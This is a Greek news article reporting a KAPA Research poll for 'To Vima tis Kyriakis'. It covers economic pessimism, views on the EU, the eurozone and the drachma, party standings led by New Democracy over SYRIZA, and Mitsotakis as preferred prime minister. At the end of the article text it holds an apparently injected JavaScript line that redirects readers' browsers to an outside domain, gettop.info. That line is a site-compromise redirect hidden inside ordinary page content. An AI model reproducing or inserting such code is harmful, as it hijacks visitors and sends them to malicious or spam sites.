Δημοσκόπηση: Προβάδισμα 6,3 μονάδων για τη ΝΔ, καταλληλότερος πρωθυπουργός ο Κυρ. Μητσοτάκης

0
12

 

Απαισιόδοξοι εξακολουθούν να είναι οι πολίτες για την πορεία της ελληνικής οικονομίας, όπως καταγράφεται σε νέα δημοσκόπηση.

Σύμφωνα με τα ευρήματα της έρευνας, η ΝΔ συγκεντρώνει προβάδισμα έναντι του ΣΥΡΙΖΑ, ενώ εκτός Βουλής μένουν τρία από τα κόμματα που βρίσκονται στο σημερινό Κοινοβούλιο.

Ειδικότερα στη δημοσκόπηση της ΚΑΠΑ Research για το «Βήμα της Κυριακής» το 65% των πολιτών θεωρεί ότι το 2017 θα είναι χειρότερο από το 2016, ενώ η πλειοψηφία θεωρεί ότι έχουν εξαντληθεί οι αντοχές των πολιτών.

Στην ερώτηση εάν είναι καλύτερο να διαλυθεί η Ευρωπαϊκή Ένωση το 26% απαντά «ναι» με το 72% να λέει «όχι», ωστόσο ο σκεπτικισμός είναι μεγαλύτερος για την Ευρωζώνη. Στην ίδια ερώτηση το 47% απαντά ότι επιθυμεί τη διάλυσή της με ένα 49,5% να θέλει τη συνέχισή της. Παράλληλα το 42% εκτιμά ότι η χώρα θα ήταν καλύτερα με τη δραχμή με το 45,5% να επιθυμεί παραμονή στο ευρώ.

Η δημοσκόπηση καταγράφει και προβάδισμα 6,3 μονάδων για τη Νέα Δημοκρατία, το οποίο αυξάνεται στις 8,7 μονάδες με την αναγωγή.

Ειδικότερα:

Νέα Δημοκρατία 22,8%
ΣΥΡΙΖΑ 16,5%
Χρυσή Αυγή 6,5%
Δημοκρατική Συμπαράταξη 5,5%
ΚΚΕ 5,2%
Ένωση Κεντρώων 2,5% (με την αναγωγή μπαίνει στη Βουλή)
Ανεξάρτητοι Έλληνες 2,2% (με την αναγωγή μπαίνουν οριακά στη Βουλή)
Πλεύση Ελευθερίας 2,2% (με την αναγωγή μπαίνει στη Βουλή)
Ποτάμι 1,8%
Λαϊκή Ενότητα 1,2%
ΑΝΤΑΡΣΥΑ 1%
Άλλο κόμμα 4,7%
Αναποφάσιστοι, λευκά, αποχή 27,9%

Το 34% προκρίνει αυτοδύναμη κυβέρνηση ΝΔ ή κυβέρνηση με κορμό τη ΝΔ με ένα 23% να προκρίνει αυτοδύναμη κυβέρνηση ΣΥΡΙΖΑ ή κυβέρνηση με κορμό τον ΣΥΡΙΖΑ.

Καταλληλότερος πρωθυπουργός ο Κυριάκος Μητσοτάκης με 23,5%, ενώ ο Αλέξης Τσίπρας συγκεντρώνει 18%. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here